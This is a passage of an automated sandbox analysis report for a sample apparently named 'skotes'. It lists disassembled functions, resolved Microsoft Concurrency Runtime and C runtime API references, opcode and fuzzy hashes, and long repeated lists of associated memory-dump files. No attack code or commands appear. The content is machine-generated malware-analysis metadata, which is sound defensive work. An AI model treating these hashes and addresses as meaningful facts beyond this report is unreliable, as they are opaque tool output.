Instruction Fuzzy Hash: 6481ED3090064AEBEF568F90C955BFE7BB2AF55304F044098ED423B293C73A9D1ADB61

Function 00762970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00762982

Part of subcall function 007624E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00762504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 007629A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 007629B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 007629FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00762AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00762AD8

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: e37e12c1a01e051a88bdb1ad5cd21b13dcb5df37c11947646de607f8e7560db7
Instruction ID: 845777bd7a1b75fe3d6199117fe49fba5e638dc1e81d6974fa1b741c8e568706
Opcode Fuzzy Hash: e37e12c1a01e051a88bdb1ad5cd21b13dcb5df37c11947646de607f8e7560db7
Instruction Fuzzy Hash: 4571EC70A00649AFDF55CF94C884BBEBBB2EF45304F048098EC426B293C7799C16DB61

Function 00752832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00752876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007528DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00752913

Part of subcall function 007507ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0075080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00752993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007529DB

Part of subcall function 007507C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007507DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007529EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00752A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00752A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00752A7E

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: 506671296e92a0026cb56e695f461a1da21dabf605b8c68f18ceadafc94f7b53
Instruction ID: bece91200b91b966d58a68b765c14e731d5d9113d62d1101473383a14b1f6c9e
Opcode Fuzzy Hash: 506671296e92a0026cb56e695f461a1da21dabf605b8c68f18ceadafc94f7b53
Instruction Fuzzy Hash: 6A81E171A015668BCB18CFA8D8905EDB7B1BB5A302B24802EDC41E3342D7BC6D4BCB94

Function 007569DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00756A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00756A51
List.LIBCONCRT ref: 00756A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00756A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00756AB9
List.LIBCONCRT ref: 00756AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00756B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00756B20
List.LIBCONCRT ref: 00756B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00756B68

Part of subcall function 00755EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00755EF7
Part of subcall function 00755EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00755F09

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: 42ec0cfa7d526034df34f12fea357cc825928c156cb81069f4898a8bce771da8
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: 19514175A00209EFDF04DF54C599BEDB3A8BF08305F558069ED15AB241DBB8AE49CBD0

Function 007652A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 007653A0
type_info::operator==.LIBVCRUNTIME ref: 007653C7
___TypeMatch.LIBVCRUNTIME ref: 007654D3
IsInExceptionSpec.LIBVCRUNTIME ref: 007655AE
CallUnexpected.LIBVCRUNTIME ref: 00765650

Strings

csm, xrefs: 007652E0
csm, xrefs: 007653FE
csm, xrefs: 0076534D

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: 404fcc130e7e0244b5fe1c07349da6305bb5951cb021bbc4bfbae49d0109b973
Instruction ID: 21a035dd6c2ba26175ffb9159e102d7513ef6c468c27b43684577f8b61032e39
Opcode Fuzzy Hash: 404fcc130e7e0244b5fe1c07349da6305bb5951cb021bbc4bfbae49d0109b973
Instruction Fuzzy Hash: 1EC18971800609EFCF25DFA4C8889AEBBB6BF14315F14415AFC076B202D779DA61EB91

Function 00764840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00764877
___except_validate_context_record.LIBVCRUNTIME ref: 0076487F
_ValidateLocalCookies.LIBCMT ref: 00764908
__IsNonwritableInCurrentImage.LIBCMT ref: 00764933
_ValidateLocalCookies.LIBCMT ref: 00764988

Strings

S9v, xrefs: 00764925, 0076492E, 0076493F
csm, xrefs: 0076491D

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
